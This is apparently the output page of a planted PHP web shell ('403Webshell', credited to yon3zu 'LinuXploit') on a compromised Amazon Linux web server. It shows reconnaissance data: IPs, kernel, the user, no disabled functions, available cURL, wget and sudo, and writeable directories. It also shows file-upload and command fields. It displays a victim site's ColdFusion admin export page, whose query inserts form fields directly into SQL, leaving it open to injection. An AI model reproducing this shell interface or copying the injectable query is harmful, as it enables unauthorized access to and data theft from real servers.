403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/exportonlineguideedit.cfm
<cfcontent type="text/html;charset=iso-8859-1">
<cfprocessingDirective pageencoding="iso-8859-1">
<cfset setEncoding("Form", "ISO-8859-15")>
<cfinclude template="header.cfm">


<div id="content">
  <div id="content-header">
  </div>
  <div class="container-fluid" style="margin-left:200px;">
<cfif parameterexists(Session.email) and (Session.email IS NOT -1)>
<cfif (#getuser.accesslevel# eq 100)>

<table width=100%><tr><td>
<div align="center"><font face=verdana size=+1><strong>Export Online Guide</strong></font>
 <font face=verdana size=-1><br /><a href="exportguideedit.cfm">Export Print Guide</a></div>
<p><font face=verdana size=-2>

<cfquery name="getcities" datasource="#ds#">
select distinct ParentsListings.city
from ParentsListings inner join issueguide on ParentsListings.id = issueguide.pkid
order by city
</cfquery>

<form  method="post"  enctype="multipart/form-data" action="exportonlineguideedit.cfm">
<input name="mags" type="radio" value="BAP" <cfif parameterexists(form.mags) and #form.mags# eq 'BAP'>checked</cfif>/>BAP
<input name="mags" type="radio" value="WP" <cfif parameterexists(form.mags) and #form.mags# eq 'WP'>checked</cfif>>WP
<input name="mags" type="radio" value="BP" <cfif parameterexists(form.mags) and #form.mags# eq 'BP'>checked</cfif>>BP
<input name="mags" type="radio" value="QP" <cfif parameterexists(form.mags) and #form.mags# eq 'QP'>checked</cfif>>QP
<input name="mags" type="radio" value="RP" <cfif parameterexists(form.mags) and #form.mags# eq 'RP'>checked</cfif>>RP
<Br />
<select name="issue">
<option value="March 2008">March 2008
<option value="April 2008">April 2008
<option value="May 2008">May 2008
<option value="June 2008">June 2008
<option value="July 2008">July 2008
<option value="August 2008">August 2008
<option value="September 2008">September 2008
<option value="October 2008">October 2008
<option value="November 2008">November 2008
<option value="December 2008">December 2008
<option value="January 2009">January 2009
<option value="February 2009">February 2009
<option value="March 2009">March 2009
<option value="April 2009">April 2009
<option value="May 2009">May 2009
<option value="June 2009">June 2009
<option value="July 2009">July 2009
<option value="August 2009">August 2009
</select>

<select name="city">
<cfif #parameterexists(form.city)#><Cfoutput><option value="#form.city#">#form.city#</Cfoutput></cfif>
<option value="All">All
<cfoutput query="getcities">
<option value="#city#">#city#
</cfoutput>
</option>
</select>

 <input type="submit" Value="Search"></form>

 <cfif parameterexists(form.issue)>

 <cfquery name="getstuff" datasource="#ds#">
 select issueguide.writeup, issueguide.editedby, issueguide.id as isid, issueguide.pkid, issueguidecat.issue,issueguidecat.mags,issueguidecat.issueguideid,ParentsListings.*,issueguidecat.pickup
 from issueguide inner join issueguidecat on issueguidecat.issueguideid = issueguide.id inner join ParentsListings on issueguide.pkid = ParentsListings.id
 where issueguidecat.issue = '#form.issue#' and issueguidecat.mags like '%#form.mags#%' <cfif #form.city# is not 'All'>and city = '#form.city#'</cfif>
 order by ParentsListings.name
 </cfquery>
 <p>
 <font face=verdana size=-1>
 <Cfoutput query="getstuff">
<a href="https://www.nymetroparents.com/bestbetsinfo.cfm?id=#pkid#"><cfif #publishedname# eq ''><strong>#ucase(name)#<br /></strong><cfelse>
<strong><a href="http://www.nymetroparents.com/bestbetsinfo.cfm?id=#pkid#">#replace(publishedname, chr(10), "<br />", "All")#</strong></cfif></a> <cfif #editedby# is not ''><strong>UPDATED BY #EDITEDBY#</strong></cfif><cfif #PICKUP# is not ''><strong>PICKUP</strong></cfif>

<cfif #address# is not ''>#address#, #city#<br /></cfif>
<cfif #phone# is not ''>#phone#<br /></cfif>
<cfif #locationmultiple# is not ''>#replace(locationmultiple, chr(10), "<br />", "All")#<br /></cfif>
<cfif #website# is not ''><a href="http://#website#" target="new">#website#<br /></a></cfif>
<cfif #showemail# eq 0 and #email# is not ''>Email #email#<br /></cfif>
#writeup#
<p>

 </Cfoutput>

 </cfif>

</td></tr></table>

</cfif>
</cfif>

Youez - 2016 - github.com/yon3zu
LinuXploit